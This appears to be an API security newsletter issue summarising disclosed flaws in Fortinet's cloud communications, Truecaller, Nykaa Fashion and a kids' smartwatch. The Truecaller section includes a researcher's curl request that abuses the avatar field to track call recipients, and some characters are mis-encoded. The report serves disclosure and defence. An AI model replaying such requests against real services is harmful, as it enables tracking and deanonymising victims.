Issue 59: Vulnerabilities in Fortinet, Truecaller, Nykaa Fashion, SMA M2 smartwatch

This week is all about API vulnerabilities. We found them everywhere: from client to cloud communications of Fortinet products to avatar hacks in Truecaller app,ย  an authentication flaw in Nykaa Fashion, and yet another kids smartwatch system with almost total lack of security.

Vulnerability: Fortinet

Researchers from SEC Consult have found bad implementation in various Fortinet products. Embarrassingly, these were security products, including FortiGuard Web Filter, FortiGuard AntiSpam, and FortiGuard AntiVirus. Turns out that the implementation of communications between their clients and their cloud backend left a lot to be desired.

All of the products rely on UDP and HTTP POST calls to send data from local clients to the cloud service. This data includes, for example:

  • Fortinet serial number
  • Full URLs in browsing history for FortiGuard Web Filter
  • Email data for FortiGuard AntiSpam
  • Unspecified data for FortiGuard AntiVirus

For some reason, instead of using standard encryption protocols, the products were simply applying XOR operations on the data. Even worse, they were XORing the data with a hard-coded key. This meant that anyone who had found this key could easily decrypt, read, and modify traffic.

Reinventing the wheel in security is a bad idea. Using established encryption protocols and standards and their off-the-shelf implementation makes your product a lot more secure.

Vulnerability: Truecaller

Ehraz Ahmed had a good week with two API vulnerabilities that he had found getting disclosed.

The first one is a vulnerability in Truecaller. Truecaller is a mobile app that uses crowdsourcing to report caller information. They also have a web application for looking up information on a specific number.

Ahmed found that he could use the Truecaller API to set a URL as the avatar image for numbers. What’s more, there was no enforcement of a particular domain or pattern for the URL, leaving the door open for malicious links. This allowed him to supply a URL of his PHP script instead of a picture with the following curl (see the avatarUrl part):

curl -H 'Host:' -H 'accept: */*' -H 'content-type: application/json'
-H 'authorization: Bearer a1i04--GtxQi9FOkBlKqrWwysymvge3xWRT1DdLx5w1DuJ3igycM5_OVL5ClNA_p'
-H 'user-agent: Truecaller/10.23.11 (com.truesoftware.TrueCallerOther; build:10.23.11; iOS 12.4.0; device:iPhone9,3) Alamofire/4.8.0'
-H 'accept-language: en-IN;q=1.0, hi-IN;q=0.9' --data-binary '{"personalData":{"address":{"country":"in","street":"",
"onlineIds":{"email":"","url":""}},"lastName":"Wong","firstName":"Sum Ting"}'
--compressed ''

Once this was done, he could start calling his victims from that number. If the victim opened the profile of the number, the Truecaller client tried to retrieve the avatar as well. This would trigger the PHP script to log information about the invoker (the victim), including the IP address and client operating system (Android, iOS) and its version.

Vulnerability: Nykaa Fashion

The other vulnerability that Ahmed found was with a popular Indian beauty and fashion retailer, Nykaa Fashion. With the customer base of about a million, the potential impact of the vulnerability would have been considerable.

Unfortunately, the details of the actual vulnerability are scant. Looks like this had something to do with authentication:

โ€œOne of their Internal APIs can log you into any Nykaa Fashion account, bypassing your Email Address into the request, and in response, it returns with the Access Token […]

Hackers and Telemarketers can mine the data…(of approximately a million users) by automating a script using a phone number dump found onlineโ€

Our advice is to use standard authentication protocols and their off-the-shelf implementations. For administrative access, use roles and groups, and ensure that any administrative functions have authorization checks in place.

Vulnerability: SMA M2 Kids Smartwatch

Unfortunately, API vulnerabilities in children’s GPS smartwatches are extremely common. We have already covered some of them in our issues 7, 18, 19, and 26.

This week, the IoT laboratory of the AV-TEST Institute has found glaring security holes in the APIs of SMA-WATCH-M2 kid’s smartwatch, manufactured by the Chinese company Shenzhen Smart Care Technology Ltd.

As with other similar products, parents control the watch with a smartphone app and a cloud service. Communications go through REST APIs over public internet.

The following API security issues were reported:

  • Although the API requires authentication tokens, the tokens are actually not verified โ€” so the API is effectively wide open.
  • The API uses IDs that can be enumerated. Thus, a successful brute force attack would find all devices in use.

As the result, researchers found more that 5 000 smartwatches in use. They could:

  • Find all information that parents had entered in the profile (names, addresses, pictures, phone numbers…)
  • Get the current GPS coordinates of the device
  • Perform actions, such as calling or messaging the device

Scary stuff. We can only agree with the researchers that a device like this puts children in danger instead of protecting them.

Get API Security news directly in your Inbox.

By clicking Subscribe you agree to our Data Policy